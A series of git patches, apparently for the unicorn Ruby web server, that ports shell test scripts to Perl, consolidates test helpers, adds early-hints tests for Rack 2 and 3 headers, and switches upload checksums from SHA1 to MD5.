+	print $s @req, "\r\n\r\n" if @req;
 	$s;
 }
 
-sub start_req {
-	my ($srv, @req) = @_;
-	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n";
-	$c;
-}
-
 sub slurp {
 	open my $fh, '<', $_[0];
 	local $/;

[-- Attachment #16: 0015-port-t9000-preread-input.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3856 bytes --]

From 1b8840d8d13491eecd2fa92e06f73c65eadd33ba Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:44 +0000
Subject: [PATCH 15/23] port t9000-preread-input.sh to Perl 5

Stuffing it into t/integration.t for now so we can save on
startup costs.
---
 t/integration.t          | 32 ++++++++++++++++++++++++---
 t/lib.perl               |  2 +-
 t/preread_input.ru       |  4 +---
 t/t9000-preread-input.sh | 48 ----------------------------------------
 4 files changed, 31 insertions(+), 55 deletions(-)
 delete mode 100755 t/t9000-preread-input.sh

diff --git a/t/integration.t b/t/integration.t
index b33e3c3..f5afd5d 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -7,8 +7,8 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-my $srv = tcp_server();
-my $host_port = tcp_host_port($srv);
+our $srv = tcp_server();
+our $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
@@ -209,8 +209,34 @@ SKIP: {
 	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
-}
 
+	diag 'testing Unicorn::PrereadInput...';
+	local $srv = tcp_server();
+	local $host_port = tcp_host_port($srv);
+	check_stderr;
+	truncate($errfh, 0);
+
+	my $pri = unicorn(qw(-E none t/preread_input.ru), { 3 => $srv });
+	$url = "http://$host_port/";
+
+	$do_curl->(qw(-T t/random_blob));
+	seek($rh, 0, SEEK_SET);
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+
+	my @pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2, 'app dispatched twice');
+
+	# abort a chunked request by blocking curl on a FIFO:
+	$c = tcp_start($srv, "PUT / HTTP/1.1\r\nTransfer-Encoding: chunked");
+	close $c;
+	@pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2,
+			'app did not dispatch on aborted request');
+	undef $pri;
+	check_stderr;
+	diag 'Unicorn::PrereadInput middleware tests done';
+}
 
 # ... more stuff here
 
diff --git a/t/lib.perl b/t/lib.perl
index 1d6e78d..b6148cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -79,7 +79,7 @@ sub tcp_start ($@) {
 
 sub slurp {
 	open my $fh, '<', $_[0];
-	local $/;
+	local $/ if !wantarray;
 	readline($fh);
 }
 
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 79685c4..f0a1748 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,8 +1,6 @@
 #\-E none
 require 'digest/sha1'
 require 'unicorn/preread_input'
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
@@ -13,5 +11,5 @@
     dig.update(buf)
   end
 
-  [ 200, {}, [ "#{dig.hexdigest}\n" ] ]
+  [ 200, {}, [ dig.hexdigest ] ]
 }
diff --git a/t/t9000-preread-input.sh b/t/t9000-preread-input.sh
deleted file mode 100755
index d6c73ab..0000000
--- a/t/t9000-preread-input.sh
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 9 "PrereadInput middleware tests"
-
-t_begin "setup and start" && {
-	random_blob_sha1=$(rsha1 < random_blob)
-	unicorn_setup
-	unicorn  -D -c $unicorn_config preread_input.ru
-	unicorn_wait_start
-}
-
-t_begin "single identity request" && {
-	curl -sSf -T random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "single chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "aborted chunked request" && {
-	rm -f $tmp
-	curl -sSf -T- < $fifo http://$listen/ > $tmp &
-	curl_pid=$!
-	kill -9 $curl_pid
-	wait
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "killing succeeds" && {
-	kill -QUIT $unicorn_pid
-}
-
-t_done

[-- Attachment #17: 0016-port-t-t0116-client_body_buffer_size.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8861 bytes --]

From e9593301044f305d4a0e074f77eea35015ca0ec4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:45 +0000
Subject: [PATCH 16/23] port t/t0116-client_body_buffer_size.sh to Perl 5

While I'm fine with depending on curl for certain things,
there's no need for it here since unicorn has had lazy
rack.input for over a decade, at this point.
---
 t/active-unix-socket.t                     |  1 +
 t/{t0116.ru => client_body_buffer_size.ru} |  2 -
 t/client_body_buffer_size.t                | 83 ++++++++++++++++++++++
 t/integration.t                            | 10 ---
 t/lib.perl                                 | 12 +++-
 t/t0116-client_body_buffer_size.sh         | 80 ---------------------
 6 files changed, 95 insertions(+), 93 deletions(-)
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 delete mode 100755 t/t0116-client_body_buffer_size.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 8723137..4e11837 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -109,4 +109,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 }
 
 check_stderr;
+undef $tmpdir;
 done_testing;
diff --git a/t/t0116.ru b/t/client_body_buffer_size.ru
similarity index 82%
rename from t/t0116.ru
rename to t/client_body_buffer_size.ru
index fab5fce..44161a5 100644
--- a/t/t0116.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,6 +1,4 @@
 #\ -E none
-use Rack::ContentLength
-use Rack::ContentType, 'text/plain'
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
new file mode 100644
index 0000000..b1a99f3
--- /dev/null
+++ b/t/client_body_buffer_size.t
@@ -0,0 +1,83 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $uconf = "$tmpdir/u.conf.rb";
+
+open my $conf_fh, '>', $uconf;
+$conf_fh->autoflush(1);
+print $conf_fh <<EOM;
+client_body_buffer_size 0
+EOM
+my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
+my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $uconf);
+my $ar = unicorn(@uarg, { 3 => $srv });
+my ($c, $status, $hdr);
+my $mem_class = 'StringIO';
+my $fs_class = 'Unicorn::TmpIO';
+
+$c = tcp_start($srv, "PUT /input_class HTTP/1.0\r\nContent-Length: 0");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'zero-byte file is StringIO');
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+print $c '.';
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 byte file is filesystem-backed');
+
+
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+seek($conf_fh, 0, SEEK_SET);
+truncate($conf_fh, 0);
+print $conf_fh <<EOM;
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+$ar->do_kill('HUP');
+open my $fifo_fh, '<', $fifo;
+like(my $wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ default client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'class for a 1 byte file is memory-backed');
+
+
+my $one_meg = 1024 ** 2;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte file is FS-backed');
+
+# reload with bigger client_body_buffer_size
+say $conf_fh "client_body_buffer_size $one_meg";
+$ar->do_kill('HUP');
+open $fifo_fh, '<', $fifo;
+like($wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ bigger client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, '1 megabyte file is now memory-backed');
+
+my $too_big = $one_meg + 1;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $too_big");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte + 1 byte file is FS-backed');
+
+
+undef $ar;
+check_stderr;
+undef $tmpdir;
+done_testing;
diff --git a/t/integration.t b/t/integration.t
index f5afd5d..855c260 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -15,16 +15,6 @@ open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
-END { diag slurp("$tmpdir/err.log") if $tmpdir };
-sub slurp_hdr {
-	my ($c) = @_;
-	local $/ = "\r\n\r\n"; # affects both readline+chomp
-	chomp(my $hdr = readline($c));
-	my ($status, @hdr) = split(/\r\n/, $hdr);
-	diag explain([ $status, \@hdr ]) if $ENV{V};
-	($status, \@hdr);
-}
-
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index b6148cf..2685c3b 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,11 +11,12 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 
 sub check_stderr () {
 	my @log = slurp("$tmpdir/err.log");
@@ -25,6 +26,15 @@ sub check_stderr () {
 	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 }
 
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
diff --git a/t/t0116-client_body_buffer_size.sh b/t/t0116-client_body_buffer_size.sh
deleted file mode 100755
index c9e17c7..0000000
--- a/t/t0116-client_body_buffer_size.sh
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 12 "client_body_buffer_size settings"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rtmpfiles unicorn_config_tmp one_meg
-	dd if=/dev/zero bs=1M count=1 of=$one_meg
-	cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-end
-EOF
-	cat $unicorn_config > $unicorn_config_tmp
-	echo client_body_buffer_size 0 >> $unicorn_config
-	unicorn -D -c $unicorn_config t0116.ru
-	unicorn_wait_start
-	fs_class=Unicorn::TmpIO
-	mem_class=StringIO
-
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a zero-byte file should be StringIO" && {
-	> $tmp
-	test xStringIO = x"$(curl -T $tmp -sSf http://$listen/input_class)"
-}
-
-t_begin "class for a 1 byte file should be filesystem-backed" && {
-	echo > $tmp
-	test x$fs_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "reload with default client_body_buffer_size" && {
-	mv $unicorn_config_tmp $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a 1 byte file should be memory-backed" && {
-	echo > $tmp
-	test x$mem_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "class for a random blob file should be filesystem-backed" && {
-	resp="$(curl -T random_blob -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "one megabyte file should be filesystem-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "reload with a big client_body_buffer_size" && {
-	echo "client_body_buffer_size(1024 * 1024)" >> $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "one megabyte file should be memory-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$mem_class = x"$resp"
-}
-
-t_begin "one megabyte + 1 byte file should be filesystem-backed" && {
-	echo >> $one_meg
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #18: 0017-tests-get-rid-of-sha1sum.rb-and-rsha1-sh-function.patch --]
[-- Type: text/x-diff, Size: 1255 bytes --]

From b47912160f2336dde3901e588cc23fb2c2f8d9dc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:46 +0000
Subject: [PATCH 17/23] tests: get rid of sha1sum.rb and rsha1() sh function

These are no longer needed since Perl has long included
Digest::SHA
---
 t/bin/sha1sum.rb | 17 -----------------
 t/test-lib.sh    |  4 ----
 2 files changed, 21 deletions(-)
 delete mode 100755 t/bin/sha1sum.rb

diff --git a/t/bin/sha1sum.rb b/t/bin/sha1sum.rb
deleted file mode 100755
index 53d68ce..0000000
--- a/t/bin/sha1sum.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# Reads from stdin and outputs the SHA1 hex digest of the input
-
-require 'digest/sha1'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-bs = 16384
-digest = Digest::SHA1.new
-if buf = $stdin.read(bs)
-  begin
-    digest.update(buf)
-  end while $stdin.read(bs, buf)
-end
-
-$stdout.syswrite("#{digest.hexdigest}\n")
diff --git a/t/test-lib.sh b/t/test-lib.sh
index e70d0c6..8613144 100644
--- a/t/test-lib.sh
+++ b/t/test-lib.sh
@@ -123,7 +123,3 @@ unicorn_wait_start () {
 	# no need to play tricks with FIFOs since we got "ready_pipe" now
 	unicorn_pid=$(cat $pid)
 }
-
-rsha1 () {
-	sha1sum.rb
-}

[-- Attachment #19: 0018-early_hints-supports-Rack-3-array-headers.patch --]
[-- Type: text/x-diff, Size: 4606 bytes --]

From 6ad9f4b54ee16ffecea7e16b710552b45db33a16 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:47 +0000
Subject: [PATCH 18/23] early_hints supports Rack 3 array headers

We can hoist out append_headers into a new method and use it in
both e103_response_write and http_response_write.

t/integration.t now tests early_hints with both possible
values of check_client_connection.
---
 t/integration.ru |  7 +++++++
 t/integration.t  | 47 ++++++++++++++++++++++++++++++++++++++++++-----
 2 files changed, 49 insertions(+), 5 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index edc408c..dab384d 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -5,6 +5,11 @@
 # this goes for t/integration.t  We'll try to put as many tests
 # in here as possible to avoid startup overhead of Ruby.
 
+def early_hints(env, val)
+  env['rack.early_hints'].call('link' => val) # val may be ary or string
+  [ 200, {}, [ val.class.to_s ] ]
+end
+
 $orig_rack_200 = nil
 def tweak_status_code
   $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
@@ -81,6 +86,8 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    when '/early_hints_rack2'; early_hints(env, "r\n2")
+    when '/early_hints_rack3'; early_hints(env, %w(r 3))
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 855c260..8433497 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -13,8 +13,16 @@ my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
+my $u1 = "$tmpdir/u1";
+print $conf_fh <<EOM;
+early_hints true
+listen "$u1"
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
@@ -102,6 +110,26 @@ $c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
+my $ck_early_hints = sub {
+	my ($note) = @_;
+	$c = unix_start($u1, 'GET /early_hints_rack2 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 2 value');
+	is_deeply(['link: r', 'link: 2'], $hdr, 'rack 2 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'String', 'early hints used a String for rack 2');
+
+	$c = unix_start($u1, 'GET /early_hints_rack3 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 3');
+	is_deeply(['link: r', 'link: 3'], $hdr, 'rack 3 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'Array', 'early hints used a String for rack 3');
+};
+$ck_early_hints->('ccc off'); # we'll retest later
+
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
@@ -154,6 +182,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
+	skip 'SKIP_EXPENSIVE on', 1 if $ENV{SKIP_EXPENSIVE};
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
@@ -232,16 +261,24 @@ SKIP: {
 
 # SIGHUP-able stuff goes here
 
+if ('check_client_connection') {
+	print $conf_fh <<EOM; # appending to existing
+check_client_connection true
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$ck_early_hints->('ccc on');
+}
+
 if ('max_header_len internal API') {
 	undef $c;
 	my $req = 'GET / HTTP/1.0';
 	my $len = length($req."\r\n\r\n");
-	my $fifo = "$tmpdir/fifo";
-	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
-	print $conf_fh <<EOM;
+	print $conf_fh <<EOM; # appending to existing
 Unicorn::HttpParser.max_header_len = $len
-listen "$host_port" # TODO: remove this requirement for SIGHUP
-after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 	$ar->do_kill('HUP');
 	open my $fifo_fh, '<', $fifo;

[-- Attachment #20: 0019-test_server-drop-early_hints-test.patch --]
[-- Type: text/x-diff, Size: 1737 bytes --]

From 3e6bc9fb589fd88469349a38a77704c3333623e0 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:48 +0000
Subject: [PATCH 19/23] test_server: drop early_hints test

t/integration.t already is more complete in that it tests
both Rack 2 and 3 along with both possible values of
check_client_connection.
---
 test/unit/test_server.rb | 31 -------------------------------
 1 file changed, 31 deletions(-)

diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index fe98fcc..0a710d1 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -23,17 +23,6 @@ def call(env)
   end
 end
 
-class TestEarlyHintsHandler
-  def call(env)
-    while env['rack.input'].read(4096)
-    end
-    env['rack.early_hints'].call(
-      "Link" => "</style.css>; rel=preload; as=style\n</script.js>; rel=preload"
-    )
-    [200, { 'content-type' => 'text/plain' }, ['hello!\n']]
-  end
-end
-
 class TestRackAfterReply
   def initialize
     @called = false
@@ -112,26 +101,6 @@ def test_preload_app_config
     tmp.close!
   end
 
-  def test_early_hints
-    teardown
-    redirect_test_io do
-      @server = HttpServer.new(TestEarlyHintsHandler.new,
-                               :listeners => [ "127.0.0.1:#@port"],
-                               :early_hints => true)
-      @server.start
-    end
-
-    sock = tcp_socket('127.0.0.1', @port)
-    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
-
-    responses = sock.read(4096)
-    assert_match %r{\AHTTP/1.[01] 103\b}, responses
-    assert_match %r{^Link: </style\.css>}, responses
-    assert_match %r{^Link: </script\.js>}, responses
-
-    assert_match %r{^HTTP/1.[01] 200\b}, responses
-  end
-
   def test_after_reply
     teardown
 

[-- Attachment #21: 0020-t-integration.t-switch-PUT-tests-to-MD5-reuse-buffer.patch --]
[-- Type: text/x-diff, Size: 3740 bytes --]

From cb826915cdd1881cbcfc1fb4e645d26244dfda71 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:49 +0000
Subject: [PATCH 20/23] t/integration.t: switch PUT tests to MD5, reuse buffers

MD5 is faster, and these tests aren't meant to be secure,
they're just for checking for data corruption.
Furthermore, Content-MD5 is a supported HTTP trailer and
we can verify that here to obsolete other tests.

Furthermore, we can reuse buffers on env['rack.input'].read
calls to avoid malloc(3) and GC overhead.

Combined, these give roughly a 3% speedup for t/integration.t
on my system.
---
 t/integration.ru   | 20 +++++++++++++++-----
 t/integration.t    |  5 ++---
 t/preread_input.ru | 17 ++++++++++++-----
 3 files changed, 29 insertions(+), 13 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index dab384d..086126a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -55,8 +55,8 @@ def env_dump(env)
 def rack_input_tests(env)
   return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
   cap = 16384
-  require 'digest/sha1'
-  digest = Digest::SHA1.new
+  require 'digest/md5'
+  dig = Digest::MD5.new
   input = env['rack.input']
   case env['PATH_INFO']
   when '/rack_input/size_first'; input.size
@@ -68,11 +68,21 @@ def rack_input_tests(env)
   if buf = input.read(rand(cap))
     begin
       raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
+      dig.update(buf)
     end while input.read(rand(cap), buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
   end
-  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
-    [ digest.hexdigest ] ]
+  h = { 'content-type' => 'text/plain' }
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    if cmd5_bin != dig.digest
+      h['content-length'] = cmd5_b64.size.to_s
+      return [ 500, h, [ cmd5_b64 ] ]
+    end
+  end
+  h['content-length'] = '32'
+  [ 200, h, [ dig.hexdigest ] ]
 end
 
 run(lambda do |env|
diff --git a/t/integration.t b/t/integration.t
index 8433497..38a9675 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,7 +27,6 @@ my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
 		my $bs = $opt{bs} // 16384;
-		require Digest::MD5;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -186,8 +185,8 @@ SKIP: {
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
-	require Digest::SHA;
-	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+	require Digest::MD5;
+	$blob_hash = Digest::MD5->new->addfile($rh)->hexdigest;
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
diff --git a/t/preread_input.ru b/t/preread_input.ru
index f0a1748..18af221 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,15 +1,22 @@
 #\-E none
-require 'digest/sha1'
+require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
   $stderr.write "app dispatch: #{nr += 1}\n"
   input = env["rack.input"]
-  dig = Digest::SHA1.new
-  while buf = input.read(16384)
-    dig.update(buf)
+  dig = Digest::MD5.new
+  if buf = input.read(16384)
+    begin
+      dig.update(buf)
+    end while input.read(16384, buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
+  end
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    return [500, {}, [ cmd5_b64 ] ] if cmd5_bin != dig.digest
   end
-
   [ 200, {}, [ dig.hexdigest ] ]
 }

[-- Attachment #22: 0021-tests-move-test_upload.rb-tests-to-t-integration.t.patch --]
[-- Type: text/x-diff, Size: 12280 bytes --]

From 181e4b5b6339fc5e9c3ad7d3690b736f6bd038aa Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:50 +0000
Subject: [PATCH 21/23] tests: move test_upload.rb tests to t/integration.t

The overread tests are ported over, and checksumming alone
is enough to guard against data corruption.

Randomizing the size of `read' calls on the client side will
shake out any boundary bugs on the server side.
---
 t/integration.t          |  32 ++++-
 test/unit/test_upload.rb | 301 ---------------------------------------
 2 files changed, 27 insertions(+), 306 deletions(-)
 delete mode 100644 test/unit/test_upload.rb

diff --git a/t/integration.t b/t/integration.t
index 38a9675..a568758 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -26,7 +26,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -36,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs);
+			$r = read($in, $buf, 999 + int(rand(0xffff)));
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -46,15 +45,15 @@ EOM
 	},
 	identity => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $clen = $opt{-s} // -s $in;
 		print $out <<EOM;
 PUT $path HTTP/1.0\r
 Content-Length: $clen\r
 \r
 EOM
-		my ($buf, $r, $len);
+		my ($buf, $r, $len, $bs);
 		while ($clen) {
+			$bs = 999 + int(rand(0xffff));
 			$len = $clen > $bs ? $bs : $clen;
 			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
@@ -192,8 +191,10 @@ SKIP: {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
 		$c = tcp_start($srv);
-		$c->autoflush(0);
+		$c->autoflush($opt{sync} // 0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
